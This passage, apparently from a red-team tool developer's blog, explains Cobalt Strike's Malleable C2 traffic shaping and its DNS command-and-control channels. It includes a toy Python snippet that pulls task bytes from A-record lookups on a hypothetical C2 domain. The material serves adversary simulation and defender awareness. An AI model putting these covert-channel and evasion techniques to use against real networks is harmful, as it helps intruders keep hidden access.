Network indicators are another story. Once a blue team understands what your tool looks like on the wire, it’s generally game over for that capability. Cobalt Strike has a good handle on this problem too. Malleable C2 lets Cobalt Strike’s end-users change Cobalt Strike’s indicators on the wire.

Specifically:

You get to transform and define where in a POST and GET transaction Beacon stores its metadata, output, and tasks. If you want to base64 encode an encrypted task and wrap it in HTML, you’re welcome to do that. If you want to stick your encrypted tasks in the middle of an image, this is trivial to do too.

You get to dress up your transaction with extra indicators. You can add whichever client and server headers you want to HTTP POST and GET transactions. You can add arbitrary parameters to your GET and POST requests. You also get to define the URLs used for each of these.

These two pieces combined together give you a lot of control over what Cobalt Strike’s Beacon looks like on the wire. If you want, you can look like known malware. Or, you can blend in with existing traffic. Or, do something in between to adjust your activity to what your training audience is ready for.

Now, what about that customer? Sadly, Malleable C2 didn’t exist at the time of that call. We were able to figure out a one-off work-around for their situation. Today it’s a different story. Between Artifact Kit and Malleable C2, it’s quite feasible to make Cobalt Strike look like a new actor. You can do this on a weekly or even daily basis, if you need to. This flexibility is a big step towards resolving the openness versus future effectiveness conflict.

DNS Communication is a Gimmick

February 4, 2015

I added DNS Communication to Cobalt Strike in June 2013 and refined it further in July 2013. On sales calls and at conferences I get a lot of questions and compliments on this feature. That’s great.

I’ve also heard the opposite. I’ve heard folks say that DNS Command and Control is noisy. It’s “easy to detect”. I’ve had someone go so far as to say that it’s a gimmick.

I have a philosophy: I like options. I have a preferred way to work. I stay aware of how this preferred way may break down. When this happens, I like to know I can still work and get things done. Cobalt Strike’s DNS C2 is a great example of how this philosophy influences my development choices.

Beacon first shipped in the 27 Sept 2012 release of Cobalt Strike. This first Beacon could beacon over DNS or HTTP. The DNS Beacon would periodically make an A record request to a domain that I, the attacker, am authoritative for. My server would provide a response that told the Beacon whether or not it should make an HTTP request to download its tasks. I built this Beacon for stealth. By checking for requests with DNS, I limit how often my compromised systems need to connect directly to me.

[Diagram: DNS Beacon check-in over A record requests]

The above is not easy to detect. I’ve had folks tell me that they see this behavior in production. One A record request every 24 hours or every week is not trivial to find. This is scary.

In the first half of 2013 I had several opportunities to use Cobalt Strike. I took advantage of the DNS Beacon as a persistent agent. During this time I ran into a scenario I call “the child in the well”. I would see a compromised host beacon, but it would never connect to me to download its tasks. This is a terrible situation. My compromised system can call out to me. I know it’s there. But, I can’t reach it. This happened to me twice and I knew I needed to do something about it.

I added a mode command to the DNS Beacon. This command allows the end-user to state which data channel Beacon should use to download its tasks. When a tasking is available, I communicate this channel preference to the DNS Beacon in my 4-byte A record response.

I added modes to communicate over HTTP, DNS A records, and DNS TXT records. Each of these channels has its purpose and I allow the user to switch back and forth between them for each deployed DNS Beacon.

The HTTP data channel is the default. The compromised system connects to me with a GET request to download its tasks. It uses a POST request to send output when it’s available.

If I run into a child in the well scenario I have a choice between the two DNS data channels.

I used to use Beacon primarily as a lifeline to send sessions to other team servers. The A record channel is in the spirit of this original use case. I can task the Beacon and it will download its tasking 4 bytes at a time. If the system can beacon to me, then I have some option to control it. The A record data channel isn’t efficient, but it works in a pinch.
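
To make the mechanics concrete, here’s a toy sketch of the general idea (not Cobalt Strike’s actual protocol): the controller encodes four bytes of data into the IPv4 answer for a name it’s authoritative for, and the agent recovers those bytes from an ordinary lookup.

# a_record_toy.py - treat an A record answer as 4 bytes of data
import socket

def fetch_chunk(hostname):
    # resolve a name under a domain the controller owns; the answer is data
    ip = socket.gethostbyname(hostname)       # e.g. '77.76.75.74'
    return bytes(int(octet) for octet in ip.split('.'))

# chunk = fetch_chunk('task0001.example-c2-domain.com')   # hypothetical name
# At 4 bytes per lookup, a 1 KB task takes ~256 queries: workable, not efficient.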

I added the TXT record channel at the same time I built a SOCKS proxy server into Beacon. This was July 2013. I built these capabilities into Beacon to keep with an offense in depth philosophy. If I can’t get out of a network on any channel, except DNS, I need a way to continue to work. I saw pivoting as essential to this and so I built the SOCKS proxy server. The TXT record channel is suitable for tunneling some traffic through a Beacon.

I hope this post helps shine light on how I use DNS for covert communication. As a beacon with a high sleep time, it’s stealthy. As a data channel, it’s useful when there are no other options. Which option makes sense will depend on your context. The ability to match tool to context comes from mature tradecraft.
